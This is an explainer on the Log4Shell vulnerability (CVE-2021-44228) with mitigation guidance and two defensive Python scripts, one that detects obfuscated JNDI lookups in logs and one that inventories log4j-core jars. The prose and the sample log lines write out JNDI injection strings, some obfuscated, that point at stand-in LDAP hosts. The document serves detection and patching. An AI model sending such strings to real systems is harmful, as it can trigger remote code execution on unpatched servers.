Log4j: The Security Vulnerability that Could Affect the Entire Internet


The Context

Last week, the non-profit Apache Software Foundation disclosed a critical vulnerability in its Log4j software. The announcement caused widespread alarm across private sector companies and government agencies, and cybersecurity professionals across the world have been racing to address the flaw. The vulnerability in Log4j, a widely used software library that lets developers record the activity of applications and online services, puts hundreds of millions of devices at risk of being targeted in large-scale cyberattacks. The Log4j vulnerability is one of the most severe the world has yet seen, and it has been assigned the maximum CVSS severity score of 10.0 out of 10.

What exactly is Log4j?

Log4j is a popular Java software library that developers use to record what their applications and systems are doing, including error messages. This form of activity logging helps software developers review error messages and address issues. Log4j was developed by the Apache Software Foundation and is one of the most widely used logging tools in corporate networks, applications, and web services. The vulnerable code is in Log4j 2, the current major version; the older, unsupported Log4j 1.x branch does not contain the affected lookup feature and is not affected by CVE-2021-44228.

How can hackers exploit the Log4j vulnerability?

The recently disclosed flaw in Log4j, tracked as CVE-2021-44228 and nicknamed Log4Shell, makes it easy for attackers to gain control of servers. More specifically, CVE-2021-44228 allows an unauthenticated attacker to execute code remotely on a targeted device. The root cause is a feature of the library: Log4j 2 (versions 2.0-beta9 through 2.14.1) evaluates lookup expressions of the form ${...} that appear in the messages it logs. If an attacker can get a string such as ${jndi:ldap://attacker-host/x} written to a log, for example by sending it in an HTTP header, a username, or a chat message, the library performs a JNDI lookup against the attacker's server and can be made to load and run attacker-supplied Java code. Because almost any user-controlled input ends up in a log somewhere, the attacker can bypass security controls, take control of the machine, exfiltrate data, or install malware. CVE-2021-44228 was a zero day in the sense that it was being exploited before most of the world knew to defend against it; a fixed release (Log4j 2.15.0) was available when Apache announced the flaw, and later releases closed gaps in that first fix. Until every affected system has actually been updated, attackers will be able to exploit it and potentially wreak havoc on the global internet.
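To make the mechanism concrete, the following is an added example (not code from the original post, Apache, or any product) showing what exploit attempts look like in a web server's logs and how defenders can recognise them even when the attacker hides the ${jndi: string behind nested lookups. Log4j resolves lookups inside-out, so ${${lower:j}ndi:...} becomes ${jndi:...} before it is acted on; the script below mimics that for the lookups attackers most often abuse (lower:, upper:, and the ${key:-default} form), URL-decodes the line first, and flags lines that still contain a nested lookup it does not model. The IP addresses and log lines in SAMPLE_LINES are constructed for the example.

```python
import re
import urllib.parse

# A Log4j 2 lookup is ${...}. This regex matches only the innermost ones
# (no nested "${" inside), so nested expressions resolve inside-out, the
# same order Log4j's substitutor uses.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_NESTED = re.compile(r"\$\{[^}]*\$\{")


def _resolve_one(match):
    body = match.group(1)
    # ${key:-default}, including the degenerate ${::-x} form, evaluates to
    # the default when the key is unknown, which is always the case here.
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    # Every other lookup (jndi:, env:, sys:, date:, ...) is left untouched
    # so the checks below can still see it.
    return match.group(0)


def normalize(text, max_rounds=20):
    """Collapse lower:/upper:/default lookups until nothing changes.
    The input is URL-decoded first because these strings usually arrive in
    an HTTP header, path or query string."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        expanded = _INNERMOST.sub(_resolve_one, text)
        if expanded == text:
            break
        text = expanded
    return text


def classify(line):
    """'jndi' for a ${jndi:...} lookup (obfuscated or not), 'nested-lookup'
    for a lookup that still wraps another ${...} after normalization (an
    obfuscation this code does not model and should still be alerted on),
    or None for a benign line."""
    norm = normalize(line)
    if _JNDI.search(norm):
        return "jndi"
    if _NESTED.search(norm):
        return "nested-lookup"
    return None


# Constructed sample access-log lines (not taken from any real incident).
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:22 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi'
    '%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.9 - - [10/Dec/2021:14:02:30 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${date:\'j\'}ndi:ldap://198.51.100.7/a}"',
    '10.0.0.5 - - [10/Dec/2021:14:02:41 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Return (original, normalized, verdict) for every suspicious line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line, normalize(line), verdict))
    return hits


if __name__ == "__main__":
    for original, normalized, verdict in scan(SAMPLE_LINES):
        print(f"[{verdict}] {normalized}")
```

Run against real logs, pipe the access log, proxy log or application log through scan() line by line; the last sample line shows why matching on a bare "${" is too noisy, while the date-lookup line shows why matching on the literal "${jndi:" alone is not enough.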

Have hackers already taken advantage of the flaw?

Within a few hours of the disclosure, many attackers were attempting to exploit CVE-2021-44228. The cybersecurity company Check Point recorded over 800,000 exploitation attempts in the 72 hours following the public announcement of the Log4j vulnerability. Additionally, Check Point estimated that malicious groups had attempted to exploit nearly 50% of its customers' corporate networks worldwide. In fact, evidence suggests that hackers discovered the flaw days before it was publicly disclosed. According to Cloudflare CEO Matthew Prince, attackers had exploited the Log4j vulnerability as early as December 1, 2021.

Which devices are affected by CVE-2021-44228?

In short, any device, application, or system that uses a vulnerable version of Log4j is at risk. We know that Log4j has been downloaded hundreds of millions of times, but it is difficult to ascertain exactly how many systems are affected, because Log4j is bundled inside countless other pieces of software, often without the operator knowing it is there. That being said, here are some of the major technology companies whose products or services have been reported as affected so far:

  • Okta

  • Palo Alto Networks

  • Twitter

  • VMware

  • Apple

  • Amazon Web Services (AWS)

  • Cisco

  • IBM

  • Microsoft’s Minecraft

What can users do to protect themselves?

Below is some guidance from the Apache Software Foundation, large tech companies such as Microsoft, and US Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly:

  • Identify every device and application that has Log4j installed, especially those that are Internet-facing. Because Log4j is often bundled inside other software, check vendor products and application bundles as well as systems where it was installed by name.

  • Ensure that security teams are alerting on exploitation attempts against these devices, for example on log entries or requests that contain ${jndi: lookup strings, including obfuscated variants.

  • Deploy a web application firewall (WAF) with automatically updated rules to block and alert on known exploit strings. Treat the WAF as a speed bump rather than a fix: the exploit string can be obfuscated with nested lookups such as ${${lower:j}ndi:...}, and attackers adapted to signature-based filtering within days.

  • Upgrade Log4j to a fixed version. At the time of this guidance that meant Log4j 2.16.0 for Java 8 and later, or 2.12.2 for Java 7; Apache has since published further releases (2.17.0 and later on the main branch) that close additional issues found in the first fixes, so check the Apache Log4j security page for the current minimum version. Where an upgrade is not immediately possible, Apache's documented stopgap is to remove the JndiLookup class from the log4j-core jar.

  • Restrict unnecessary outbound (egress) connections from servers, which the exploit needs in order to reach the attacker's LDAP or RMI server and fetch its payload, and disable any unnecessary services in order to reduce the attack surface on your device.
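The first step, finding every copy of Log4j, is harder than it sounds because the library is usually embedded in other software. The following is an added example (not code from the original post, Apache, or CISA) of an inventory scanner: it walks a directory tree, opens every jar, war and ear, recurses into archives nested inside them, and reports the log4j-core version and whether the JndiLookup class is present, judged against the fixed versions named above (2.16.0, or 2.12.2 on the Java 7 branch). It assumes the Maven pom.properties entry is present inside log4j-core, as it is in the official artifacts; a jar that carries the class but no version is reported for manual review. The build_sample_tree() fixture creates constructed fake archives containing only the entries the scanner reads, so the example runs offline.

```python
import io
import os
import re
import tempfile
import zipfile

# Entries that identify log4j-core inside any archive, including uber jars and
# nested WEB-INF/lib jars whose file names say nothing about log4j.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); pre-release tags such as '2.0-beta9' sort low."""
    nums = [int(n) for n in re.findall(r"\d+", text.split("-")[0])]
    return tuple((nums + [0, 0, 0])[:3])


def is_fixed(version):
    """Fixed per the guidance above: 2.16.0 or later, or 2.12.2+ on the Java 7 line."""
    if version[:2] == (2, 12):
        return version >= (2, 12, 2)
    return version >= (2, 16, 0)


def _inspect(archive, label, findings):
    """Record a finding if `archive` carries log4j-core, then recurse into any
    archive nested inside it (e.g. a WAR's WEB-INF/lib/*.jar)."""
    try:
        jar = zipfile.ZipFile(archive)
    except zipfile.BadZipFile:
        return
    with jar:
        names = jar.namelist()
        has_jndi = any(n.endswith(JNDI_CLASS) for n in names)
        pom = next((n for n in names if n.endswith(POM_PROPS)), None)
        if has_jndi or pom:
            version = "unknown"
            if pom:
                for line in jar.read(pom).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            if version == "unknown":
                status = "REVIEW: log4j-core present, version not recorded"
            elif is_fixed(parse_version(version)):
                status = "OK"
            elif not has_jndi:
                status = "MITIGATED: JndiLookup.class removed, still upgrade"
            else:
                status = "VULNERABLE: below the fixed version"
            findings.append((label, version, status))
        for n in names:
            if n.lower().endswith(ARCHIVE_EXT):
                _inspect(io.BytesIO(jar.read(n)), label + "!" + n, findings)


def scan_tree(root):
    """Walk `root` and return sorted (path, version, status) tuples."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, name)
                label = os.path.relpath(full, root).replace(os.sep, "/")
                _inspect(full, label, findings)
    return sorted(findings)


# Constructed fixture: fake archives holding only the entries the scanner reads.
# The class entry is placeholder bytes, not real bytecode.
def _jar_bytes(version, include_jndi):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                                "artifactId=log4j-core\nversion=%s\n" % version)
        if include_jndi:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def _write(root, rel, data):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def build_sample_tree(root):
    _write(root, "app1/lib/log4j-core-2.14.1.jar", _jar_bytes("2.14.1", True))
    _write(root, "app2/lib/log4j-core-2.16.0.jar", _jar_bytes("2.16.0", True))
    # Hot-fixed by deleting JndiLookup.class, the stopgap Apache documented.
    _write(root, "legacy/log4j-core-2.14.1.jar", _jar_bytes("2.14.1", False))
    # Uber jar: log4j-core 2.13.3 embedded, nothing in the file name says so.
    _write(root, "svc/service-all.jar", _jar_bytes("2.13.3", True))
    # WAR with a nested jar on the Java 7 branch, one release short of the fix.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.12.1.jar", _jar_bytes("2.12.1", True))
        war.writestr("WEB-INF/classes/com/example/App.class", b"\xca\xfe\xba\xbe")
    _write(root, "web/portal.war", buf.getvalue())
    _write(root, "web/unrelated.jar", b"not even a zip file")


def run_demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, version, status in run_demo():
        print(f"{status:50} {version:8} {path}")
```

On a real host, call scan_tree() on the application roots (and on container images once extracted) rather than run_demo(); the nested-archive recursion is what catches copies shipped inside WAR files and vendor bundles, which a search by file name alone misses.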


The full guidance from CISA regarding the Log4j vulnerability is available on CISA's website.

